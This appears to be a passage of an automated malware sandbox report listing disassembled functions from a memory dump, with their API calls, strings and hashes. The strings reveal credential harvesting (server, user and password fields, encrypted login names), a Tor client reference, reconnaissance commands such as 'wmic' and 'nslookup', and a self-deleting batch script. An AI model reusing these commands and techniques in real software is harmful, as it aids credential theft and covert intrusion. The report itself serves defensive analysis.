Instruction ID: 5e9ab6460856574aab570877ac596f01b97a7ee99c63d7832b46927ffc809706
Opcode Fuzzy Hash: 7b6595aeb3ebc55972d18b0070f41f992d19867e23eb39f0389431dbda75395e
Instruction Fuzzy Hash: 27119A71214725ABCB306F65D84DADFBFB9BF48301364582AF642C2185CB35E444CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05412CE7, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 169stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0540B3ED: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,05411ABF,00000000,?,?), ref: 0540B40B
Part of subcall function 0540B3ED: GetFileSize.KERNEL32(00000000,00000000,?,?,05411ABF,00000000,?,?,?,054160B5,75145519,05405E05,75145519,?,00000000), ref: 0540B41B
Part of subcall function 0540B3ED: CloseHandle.KERNEL32(000000FF,?,?,05411ABF,00000000,?,?,?,054160B5,75145519,05405E05,75145519,?,00000000,?,05404731), ref: 0540B47D

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

Part of subcall function 0541A09C: lstrlen.KERNEL32(?,00000000,75146980,05401EA7,054151F8,?), ref: 0541A0A5
Part of subcall function 0541A09C: memcpy.NTDLL(00000000,?,00000000,?), ref: 0541A0C8
Part of subcall function 0541A09C: memset.NTDLL ref: 0541A0D7

strstr.NTDLL ref: 05412DA2

Part of subcall function 054056E1: memset.NTDLL ref: 0540570B
Part of subcall function 054056E1: lstrlen.KERNEL32(05412DBF,00000001,00000000,00000000,00000000,00000000,00002000,00000000,05426F56,?,?,?,?,?,?,05412DBF), ref: 0540571F
Part of subcall function 054056E1: memcpy.NTDLL(00000000,?,?), ref: 05405774

strstr.NTDLL ref: 05412DE7
StrChrA.SHLWAPI(?,00000040,00000000), ref: 05412E10

Strings

type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S, xrefs: 05412E5B
hostname, xrefs: 05412D3F
encryptedPassword, xrefs: 05412DBF
encryptedUsername, xrefs: 05412D7A
://, xrefs: 05412E36

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Filelstrlenmemcpymemsetstrstr$AllocateCloseCreateHandleHeapSize
String ID: ://$encryptedPassword$encryptedUsername$hostname$type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S
API String ID: 2194731920-2558769663
Opcode ID: 25438f944d7849ec7f28e9f6d7f16e3ef5e473026495e43e880d9074740c69dc
Instruction ID: df97e5b0d4e39affb1bd4a4b9ba12dbfaa0f64e283c3994670845de592a48341
Opcode Fuzzy Hash: 25438f944d7849ec7f28e9f6d7f16e3ef5e473026495e43e880d9074740c69dc
Instruction Fuzzy Hash: D6517536D09325ABCF119B6ACC45BEFBBB8AF54610F25405BEC05F7250D7B49A009B9C

Uniqueness

Uniqueness Score: -1.00%

Function 0541E18B, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 0541E1B6
StrTrimA.SHLWAPI(00000000,0A0D0920), ref: 0541E1D3
HeapFree.KERNEL32(00000000,00000000), ref: 0541E206
RtlImageNtHeader.NTDLL(00000000), ref: 0541E231
HeapFree.KERNEL32(00000000,00000000), ref: 0541E2EE

Part of subcall function 0541A09C: lstrlen.KERNEL32(?,00000000,75146980,05401EA7,054151F8,?), ref: 0541A0A5
Part of subcall function 0541A09C: memcpy.NTDLL(00000000,?,00000000,?), ref: 0541A0C8
Part of subcall function 0541A09C: memset.NTDLL ref: 0541A0D7

lstrlen.KERNEL32(00000000,00000000,0000014C,00000000,00000000), ref: 0541E29D
HeapFree.KERNEL32(00000000,00000000,00000000,0000014C,00000000,00000000), ref: 0541E2CE

Strings

TorClient, xrefs: 0541E26C, 0541E2B9

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
String ID: TorClient
API String ID: 239510280-3399603969
Opcode ID: 89650c3d7dea9357629814f070f8343dc6559f93f372b9d5e3e5e1b5b935deb1
Instruction ID: 0142316825f71b183628070c2ae5c6f85f8576b230835f9d64bb3d05a09d5f4c
Opcode Fuzzy Hash: 89650c3d7dea9357629814f070f8343dc6559f93f372b9d5e3e5e1b5b935deb1
Instruction Fuzzy Hash: F741F335B00225BBDB399A95CC59FEE7FBDEF44640F500066FE05AA2C0DBB0CA519758

Uniqueness

Uniqueness Score: -1.00%

Function 05420F91, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000001,75145520,00000000,75145520,05404623,75145520,00000001,@ID@,?,054160B5), ref: 05420FA8
lstrlen.KERNEL32(?), ref: 05420FB8
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05420FEC
RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 05421017
memcpy.NTDLL(00000000,?,?), ref: 05421036
HeapFree.KERNEL32(00000000,00000000), ref: 05421097
memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 054210B9

Strings

W, xrefs: 054210E5

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$Allocatelstrlenmemcpy$Free
String ID: W
API String ID: 3204852930-655174618
Opcode ID: 9b4d99f4cc453001af7af44fcc914590743360371b9de175709abedbe75abbfc
Instruction ID: 5010bab089ac70067a3f05ebac1e32206eecabe63957e6521ed0e093e58480af
Opcode Fuzzy Hash: 9b4d99f4cc453001af7af44fcc914590743360371b9de175709abedbe75abbfc
Instruction Fuzzy Hash: F64148B1D00269EFDF11CF95CC84AEF7BB9FF08244F55806AE905A7200EB319A54CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0540B512, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 0540B533

Part of subcall function 05411FE5: lstrlenW.KERNEL32(00000000,00000000,00000094,%APPDATA%\Microsoft\,00000000,?,?,0540B553,?), ref: 0541200A
Part of subcall function 05411FE5: RtlAllocateHeap.NTDLL(00000000,?), ref: 0541201C
Part of subcall function 05411FE5: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0540B553,?), ref: 05412039
Part of subcall function 05411FE5: lstrlenW.KERNEL32(00000000,?,?,0540B553,?), ref: 05412045
Part of subcall function 05411FE5: HeapFree.KERNEL32(00000000,00000000,?,?,0540B553,?), ref: 05412059

RtlEnterCriticalSection.NTDLL(00000000), ref: 0540B56B
CloseHandle.KERNEL32(?), ref: 0540B579
HeapFree.KERNEL32(00000000,?,?,00000001,.dll,?,00001000,?,?,?), ref: 0540B631
RtlLeaveCriticalSection.NTDLL(00000000), ref: 0540B640
HeapFree.KERNEL32(00000000,00000000,.dll,?,00001000,?,?,?), ref: 0540B653

Strings

.dll, xrefs: 0540B588
.exe, xrefs: 0540B58F, 0540B5A1, 0540B5D7

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
String ID: .dll$.exe
API String ID: 1719504581-724907077
Opcode ID: 4205af61bfe1be1ed9f9061107edc92018fe15154b32fc1f131912749ae80654
Instruction ID: c48ab0f46e152cbb5729241891b6a016581a62e4dfb6deae2a25581a5f8ea0c3
Opcode Fuzzy Hash: 4205af61bfe1be1ed9f9061107edc92018fe15154b32fc1f131912749ae80654
Instruction Fuzzy Hash: 0F41EF31A00315ABCB259F95C885EEF7BB9FB40740F6044BAF905A7290DB71CA01CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0541F474, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110memoryfilestringCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(0542DF6C), ref: 0541F486
lstrcpy.KERNEL32(00000000), ref: 0541F4BB

Part of subcall function 05412069: lstrlen.KERNEL32(?,00000008,75145519,?,00000000,05411AAB,?,054160B5,75145519,05405E05,75145519,?,00000000,?,05404731,?), ref: 05412078
Part of subcall function 05412069: mbstowcs.NTDLL ref: 05412094

GetLastError.KERNEL32(00000000), ref: 0541F54C
HeapFree.KERNEL32(00000000,?), ref: 0541F563
InterlockedDecrement.KERNEL32(0542DF6C), ref: 0541F57A
DeleteFileA.KERNEL32(00000000), ref: 0541F59B
HeapFree.KERNEL32(00000000,00000000), ref: 0541F5AB

Part of subcall function 0540DD4C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD5E
Part of subcall function 0540DD4C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD77
Part of subcall function 0540DD4C: GetCurrentThreadId.KERNEL32 ref: 0540DD84
Part of subcall function 0540DD4C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD90
Part of subcall function 0540DD4C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD9E
Part of subcall function 0540DD4C: lstrcpy.KERNEL32(00000000), ref: 0540DDC0

Strings

.avi, xrefs: 0541F4AE

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
String ID: .avi
API String ID: 908044853-1706533258
Opcode ID: 80804ab6ad6aedf2a94724dca9af21217e4d4dc0f487a434051b07f726c9e5d6
Instruction ID: 54974083d424bbc7a7e85a40b707617a2aa8f0f8fac94d6244f95c80c34e243c
Opcode Fuzzy Hash: 80804ab6ad6aedf2a94724dca9af21217e4d4dc0f487a434051b07f726c9e5d6
Instruction Fuzzy Hash: 39312672E04224BBCB219FA5CC89AEE7EB5BB48790F114056FD05E7241DB708A46D7AC

Uniqueness

Uniqueness Score: -1.00%

Function 05406C2B, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 88memoryfilestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0540DD4C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD5E
Part of subcall function 0540DD4C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD77
Part of subcall function 0540DD4C: GetCurrentThreadId.KERNEL32 ref: 0540DD84
Part of subcall function 0540DD4C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD90
Part of subcall function 0540DD4C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD9E
Part of subcall function 0540DD4C: lstrcpy.KERNEL32(00000000), ref: 0540DDC0

lstrlen.KERNEL32(00000000,?,00000F00), ref: 05406C4F

Part of subcall function 05422152: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,054192BE,wmic computersystem get domain |more ,00000000,?,00002334), ref: 05422163
Part of subcall function 05422152: lstrlen.KERNEL32(?,?,?,?,?,?,054192BE,wmic computersystem get domain |more ,00000000,?,00002334,?,?,?,?,05402B0A), ref: 0542216A
Part of subcall function 05422152: RtlAllocateHeap.NTDLL(00000000,?), ref: 0542217C
Part of subcall function 05422152: _snprintf.NTDLL ref: 0542219F
Part of subcall function 05422152: _snprintf.NTDLL ref: 054221C8
Part of subcall function 05422152: HeapFree.KERNEL32(00000000,?,00000000,?), ref: 054221E9

StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,000000FF,?,00000F00), ref: 05406CDB
HeapFree.KERNEL32(00000000,?,000000FF,?,00000F00), ref: 05406CF8
DeleteFileA.KERNEL32(00000000,00000000,?,?,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 05406D00
HeapFree.KERNEL32(00000000,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 05406D0F

Strings

ss: *.*.*.*, xrefs: 05406C91, 05406C96, 05406CB9
s:, xrefs: 05406CD1
nslookup myip.opendns.com resolver1.opendns.com , xrefs: 05406C5C

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
String ID: s:$nslookup myip.opendns.com resolver1.opendns.com $ss: *.*.*.*
API String ID: 2960378068-949792001
Opcode ID: e8e8e334a77ae1d785179a111b286de0b480d85acdcbf22ad3daab0358518142
Instruction ID: 011f8a4f0bf6137154b4920c581237c553c686b60a5ff22eebf5d355d4673cd1
Opcode Fuzzy Hash: e8e8e334a77ae1d785179a111b286de0b480d85acdcbf22ad3daab0358518142
Instruction Fuzzy Hash: 44217172A04225AFDB249BE9CD89FEF7FBCFF08250F5104AAB605E2241EB7495008760

Uniqueness

Uniqueness Score: -1.00%

Function 05411BB4, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,?,?,?), ref: 05411BD8

Part of subcall function 05422904: lstrcpy.KERNEL32(-000000FC,00000000), ref: 0542293E
Part of subcall function 05422904: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,05411BE5,?,?,?), ref: 05422950
Part of subcall function 05422904: GetTickCount.KERNEL32 ref: 0542295B
Part of subcall function 05422904: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,05411BE5,?,?,?), ref: 05422967
Part of subcall function 05422904: lstrcpy.KERNEL32(00000000), ref: 05422981

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

lstrcpy.KERNEL32(00000000), ref: 05411C08
wsprintfA.USER32 ref: 05411C1B
GetTickCount.KERNEL32 ref: 05411C30
wsprintfA.USER32 ref: 05411C3E

Part of subcall function 05408AC2: HeapFree.KERNEL32(00000000,00000000,05421258,00000000), ref: 05408ACE

Strings

"%S", xrefs: 05411C15
attrib -r -s -h %%1:%udel %%1if exist %%1 goto %udel %%0, xrefs: 05411C38
.bat, xrefs: 05411BFB

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
String ID: "%S"$.bat$attrib -r -s -h %%1:%udel %%1if exist %%1 goto %udel %%0
API String ID: 1152860224-2880143881
Opcode ID: 091da92d0441b862c364f65b1edd244a914ef75e579f88d91e1999a79723b190
Instruction ID: 7ee942679526bff9e181fbe3a9613d1868a1563626eb423baff634fec61a228a
Opcode Fuzzy Hash: 091da92d0441b862c364f65b1edd244a914ef75e579f88d91e1999a79723b190
Instruction Fuzzy Hash: F11127727143357BD2107B668C4DEDF3AACDF81650F55841BFD45A2201EEB4D80086B5

Uniqueness

Uniqueness Score: -1.00%

Function 05422152, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?,?,?,?,?,054192BE,wmic computersystem get domain |more ,00000000,?,00002334), ref: 05422163
lstrlen.KERNEL32(?,?,?,?,?,?,054192BE,wmic computersystem get domain |more ,00000000,?,00002334,?,?,?,?,05402B0A), ref: 0542216A
RtlAllocateHeap.NTDLL(00000000,?), ref: 0542217C
_snprintf.NTDLL ref: 0542219F

Part of subcall function 0542152E: memset.NTDLL ref: 05421543
Part of subcall function 0542152E: lstrlenW.KERNEL32(00000000,00000000,00000000,77A2DBB0,00000000,cmd /C "%s> %s1"), ref: 0542157C
Part of subcall function 0542152E: wcstombs.NTDLL ref: 05421586
Part of subcall function 0542152E: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77A2DBB0,00000000,cmd /C "%s> %s1"), ref: 054215B7
Part of subcall function 0542152E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,054221AD), ref: 054215E3
Part of subcall function 0542152E: TerminateProcess.KERNEL32(?,000003E5), ref: 054215F9
Part of subcall function 0542152E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,054221AD), ref: 0542160D
Part of subcall function 0542152E: CloseHandle.KERNEL32(?), ref: 05421640
Part of subcall function 0542152E: CloseHandle.KERNEL32(?), ref: 05421645

_snprintf.NTDLL ref: 054221C8

Part of subcall function 0542152E: GetLastError.KERNEL32 ref: 05421611
Part of subcall function 0542152E: GetExitCodeProcess.KERNEL32(?,00000001), ref: 05421631

HeapFree.KERNEL32(00000000,?,00000000,?), ref: 054221E9

Strings

cmd /C "%s> %s1", xrefs: 0542218E, 05422196, 054221C1
echo -------- >, xrefs: 054221BC

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
String ID: cmd /C "%s> %s1"$echo -------- >
API String ID: 1481739438-1722754249
Opcode ID: 5d1e608e1b83df06ff0f28b94e021ae08c7a64d5ea85910bae0c1dd1683020dc
Instruction ID: 78266e56bae47613809c2ea596706ac3f3fc6612cbb8f0d816b8fb0515bd3204
Opcode Fuzzy Hash: 5d1e608e1b83df06ff0f28b94e021ae08c7a64d5ea85910bae0c1dd1683020dc
Instruction Fuzzy Hash: E5119D76900138FBCF225F55DC06DDE7F79EB443A0FA18196F904A6250CB719A50DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05411C7A, Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,75145520,?,?,00000022,00000000,?,00000000), ref: 05411C91
lstrlen.KERNEL32(?,?,00000000), ref: 05411C99
lstrlen.KERNEL32(?), ref: 05411D04
RtlAllocateHeap.NTDLL(00000000,?), ref: 05411D2F
memcpy.NTDLL(00000000,00000002,?), ref: 05411D40
memcpy.NTDLL(00000000,?,?), ref: 05411D56
memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 05411D68
memcpy.NTDLL(00000000,054283F4,00000002,00000000,?,?,00000000,?,?), ref: 05411D7B
memcpy.NTDLL(00000000,00000000,00000002), ref: 05411D90

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: memcpy$lstrlen$AllocateHeap
String ID:
API String ID: 3386453358-0
Opcode ID: 327ba0676dc3faf37f57e190935c6babbef78631475d491c44819313cc62da82
Instruction ID: aa1dd34ba6c5af7851da1c5cee481c8a0b46946a44d05ac8a24a2ff8b4b1bdf8
Opcode Fuzzy Hash: 327ba0676dc3faf37f57e190935c6babbef78631475d491c44819313cc62da82
Instruction Fuzzy Hash: 40413B72E00219EBCF10DFA9CC84AEEBBB9FF48254F14445AED15A3201E771AA54DB94

Uniqueness

Uniqueness Score: -1.00%

Function 05402D75, Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 054210F6: RtlEnterCriticalSection.NTDLL(0542E288), ref: 054210FE
Part of subcall function 054210F6: RtlLeaveCriticalSection.NTDLL(0542E288), ref: 05421113
Part of subcall function 054210F6: InterlockedIncrement.KERNEL32(0000001C), ref: 0542112C

RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 05402DC6
lstrlen.KERNEL32(00000008,?,?,?,0540B266,?,00000000,75146900,00000000), ref: 05402DD5
RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 05402DE7
HeapFree.KERNEL32(00000000,00000000,?,?,?,0540B266,?,00000000,75146900,00000000), ref: 05402DF7
memcpy.NTDLL(00000000,?,?,?,?,?,0540B266,?,00000000,75146900,00000000), ref: 05402E09
lstrcpy.KERNEL32 ref: 05402E3B
RtlEnterCriticalSection.NTDLL(0542E288), ref: 05402E47
RtlLeaveCriticalSection.NTDLL(0542E288), ref: 05402E9F

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
String ID:
API String ID: 3746371830-0
Opcode ID: f27d30e9c233dc549af80cc57a07e47f58e1e431965e5572e8e06fad493094c9
Instruction ID: 785c6e7811e1dd41ec8ca8525e40e7bd68e0334a4327feccd61318bf4183b657
Opcode Fuzzy Hash: f27d30e9c233dc549af80cc57a07e47f58e1e431965e5572e8e06fad493094c9
Instruction Fuzzy Hash: D9418875514725EFCB258F54C849BEA7FB9FF04300F60802AF94692380DBB09951CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0540976C, Relevance: 13.6, APIs: 9, Instructions: 90filesynchronizationCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,0540E69C), ref: 054097AD
GetLastError.KERNEL32 ref: 054097B7
WaitForSingleObject.KERNEL32(000000C8), ref: 054097DC
CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 054097FD
SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 05409825
WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 0540983A
SetEndOfFile.KERNEL32(00000006), ref: 05409847
GetLastError.KERNEL32 ref: 05409853
CloseHandle.KERNEL32(00000006), ref: 0540985F

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
String ID:
API String ID: 2864405449-0
Opcode ID: 18d3633a69922bc1bf5cc6154b61c5602716cb15c489017d300a27ff2acd56fb
Instruction ID: cedda464b9f924d03c2db3746e0c9c84b32d54cfeacd148f3fc41e6ea2eb97a8
Opcode Fuzzy Hash: 18d3633a69922bc1bf5cc6154b61c5602716cb15c489017d300a27ff2acd56fb
Instruction Fuzzy Hash: 56316C32910208EBEB208FA4DC0ABEE7FB9FB44314F208565F911A62D1D7748A50DB21

Uniqueness

Uniqueness Score: -1.00%

Function 0541E831, Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,751444F0,?,00000000), ref: 0541E850
WriteFile.KERNEL32(?,?,000000FF,?,?), ref: 0541E884
ReadFile.KERNEL32(?,?,000000FF,?,?), ref: 0541E88C
GetLastError.KERNEL32 ref: 0541E896
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 0541E8B2
GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 0541E8CB
CancelIo.KERNEL32(?), ref: 0541E8E0
CloseHandle.KERNEL32(?), ref: 0541E8F0
GetLastError.KERNEL32 ref: 0541E8F8

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
String ID:
API String ID: 4263211335-0
Opcode ID: f5a655538c061594e52a947194acbd9b2dc4a4893fcaa0b25b298368c897dc71
Instruction ID: b8b901e233ffbca6e5dafae5f493c81c7b19c2465d6be70ce6cbd0c8e5282254
Opcode Fuzzy Hash: f5a655538c061594e52a947194acbd9b2dc4a4893fcaa0b25b298368c897dc71
Instruction Fuzzy Hash: 45216D36910228BBDB249FA9D849DEF7F7EFB44350B408422FD16D3281DB308651CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0541253B, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105stringsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 05412069: lstrlen.KERNEL32(?,00000008,75145519,?,00000000,05411AAB,?,054160B5,75145519,05405E05,75145519,?,00000000,?,05404731,?), ref: 05412078
Part of subcall function 05412069: mbstowcs.NTDLL ref: 05412094

lstrlenW.KERNEL32(00000000,?), ref: 0541258E

Part of subcall function 05415518: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,77A31120), ref: 05415564
Part of subcall function 05415518: lstrlenW.KERNEL32(?,?,77A31120), ref: 05415570
Part of subcall function 05415518: memset.NTDLL ref: 054155B8
Part of subcall function 05415518: FindFirstFileW.KERNEL32(00000000,00000000), ref: 054155D3
Part of subcall function 05415518: lstrlenW.KERNEL32(0000002C), ref: 0541560B
Part of subcall function 05415518: lstrlenW.KERNEL32(?), ref: 05415613
Part of subcall function 05415518: memset.NTDLL ref: 05415636
Part of subcall function 05415518: wcscpy.NTDLL ref: 05415648

PathFindFileNameW.SHLWAPI(00000000,00000000,*.*,?,00000000,00000000,00000000), ref: 054125A8
lstrlenW.KERNEL32(?), ref: 054125D2

Part of subcall function 05415518: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0541566E
Part of subcall function 05415518: RtlEnterCriticalSection.NTDLL(?), ref: 054156A3
Part of subcall function 05415518: RtlLeaveCriticalSection.NTDLL(?), ref: 054156BF
Part of subcall function 05415518: FindNextFileW.KERNEL32(?,00000000), ref: 054156D8
Part of subcall function 05415518: WaitForSingleObject.KERNEL32(00000000), ref: 054156EA
Part of subcall function 05415518: FindClose.KERNEL32(?), ref: 054156FF
Part of subcall function 05415518: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05415713
Part of subcall function 05415518: lstrlenW.KERNEL32(0000002C), ref: 05415735

LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 054125EF
WaitForSingleObject.KERNEL32(00000000,00000000,*.*,?,00000000,00000000,00000000), ref: 05412610
PathFindFileNameW.SHLWAPI(0000001E), ref: 05412625

Strings

*.*, xrefs: 05412598

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
String ID: *.*
API String ID: 2670873185-438819550
Opcode ID: 2e62104a11d492e195dc125b8af75894ff3438da16e25a55e68aa75825c1833b
Instruction ID: e9fe3a2a6d50fc47638f56689f0f40b493082e8a9238dcc8ad7cd1e604d2a512
Opcode Fuzzy Hash: 2e62104a11d492e195dc125b8af75894ff3438da16e25a55e68aa75825c1833b
Instruction Fuzzy Hash: 6F318276508315AFC710AF66C8888AFBFEAFF84254F50092EF885D3250DB71C905CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 05423A13, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 05423A31
RegQueryValueExA.ADVAPI32(?,Main,00000000,7519F710,00000000,?,7519F710,00000000), ref: 05423A56
RtlAllocateHeap.NTDLL(00000000,?), ref: 05423A67
RegQueryValueExA.ADVAPI32(?,Main,00000000,00000000,00000000,?), ref: 05423A82
HeapFree.KERNEL32(00000000,?), ref: 05423AA0
RegCloseKey.ADVAPI32(?), ref: 05423AA9

Strings

Main, xrefs: 05423A4D, 05423A52, 05423A7E

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreeOpen
String ID: Main
API String ID: 170146033-521822810
Opcode ID: 656b9f99c3749060cb0362ff59a93e1f207ff09292daa777281119ef7c140c54
Instruction ID: 7549e89bdb3ef5025bd11c935d05493dfe73d5d7b0b928db3d39007ac0d05477
Opcode Fuzzy Hash: 656b9f99c3749060cb0362ff59a93e1f207ff09292daa777281119ef7c140c54
Instruction Fuzzy Hash: AC11B4B6D10129FFDB159F95DD89CEEBFBDFB08244B9004AAB501A2110DB315A159B60

Uniqueness

Uniqueness Score: -1.00%

Function 05407AFD, Relevance: 12.1, APIs: 8, Instructions: 121memoryregistrysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 05407DEB: RegCreateKeyA.ADVAPI32(80000001,059587E8,?), ref: 05407E00
Part of subcall function 05407DEB: lstrlen.KERNEL32(059587E8,00000000,00000000,00000000,?,?,?,05422097,00000000,00000000,00000001,75144D40,?,?,?,05412103), ref: 05407E2E

RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 05407B42
RtlAllocateHeap.NTDLL(00000000,00000105), ref: 05407B5A
HeapFree.KERNEL32(00000000,?), ref: 05407BBC
RtlAllocateHeap.NTDLL(00000000,?), ref: 05407BD0
WaitForSingleObject.KERNEL32(00000000), ref: 05407C20
